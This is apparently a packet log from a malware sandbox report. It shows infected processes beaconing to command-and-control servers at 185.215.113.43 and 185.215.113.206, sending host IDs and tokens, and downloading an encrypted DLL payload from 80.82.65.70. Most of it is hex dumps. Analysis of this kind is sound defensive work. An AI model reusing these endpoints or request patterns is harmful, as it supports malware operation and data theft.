                                                                                                                                                                                                                                                Data Ascii: &w&w;-~9W*BjZ;Z}!Z3Z5KC2.)5;([1; ~&w; V8[~: 0^pZCZET~0jn~@Hw&w&w;;/:?[&w&w&w;3Fz:G*;r5x^G.[qN9!
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.615679026 CET1236INData Raw: 75 5e c2 02 b6 5a 43 50 ea 5a 2d 08 3d a8 e6 dd b0 e5 00 43 3d a2 be 7b 78 9a 7f 47 2a 5b c2 02 b6 59 2e d3 1e c7 4f 03 b6 dd 7e 06 31 1a b8 87 61 5a c2 02 ef 9f a6 d1 27 59 a8 86 0b 69 3e 7e b6 5a c2 da e1 e1 c1 02 3b 4a 36 31 be e5 78 15 f6 4a
                                                                                                                                                                                                                                                Data Ascii: u^ZCPZ-=C={xG*[Y.O~1aZ'Yi>~Z;J61xJW}Yl]i3XWp/BxZCW gG*\ByZCWZ2}5~1.J'YY6AJ-;a;'}yN|Z1/^2TBD[2T


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.450267185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:39.449994087 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:40.824387074 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.450275185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:42.504615068 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:43.873435020 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.450281185.215.113.206807356C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:44.690530062 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFCFHJDBKJKEBFHJEHII--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:46.630646944 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:45 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.450284185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:45.707123995 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:47.063092947 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.450295185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:48.743910074 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:50.492063046 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.450302185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:52.236618996 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:53.597697020 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.450303185.215.113.206801284C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:52.589240074 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:53.945287943 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:53 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:53.947521925 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEB
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 211
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 37 38 34 45 46 46 34 43 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="hwid"DB784EFF4CA42936050476------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="build"stok------JJDBAAEGDBKKECBGIJEB--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:54.402446985 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:54 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.450315185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:55.308522940 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:56.663542986 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:56 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.450321185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:58.421053886 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:59.797939062 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                34192.168.2.45032280.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:58.980966091 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: 1
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:00.337747097 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:00 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:00.456187010 CET386OUTGET /dll/key HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: 1
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:00.930857897 CET224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:00 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 21
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                                                                                                                                                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.043721914 CET391OUTGET /dll/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: 1
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607069016 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:01 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                                                                                                                                                                                Content-Length: 97296
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607090950 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                                                                                                                                                                                                                Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607109070 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                                                                                                                                                                                                                Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607188940 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                                                                                                                                                                                                                                Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607209921 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                                                                                                                                                                                                                                Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607228041 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
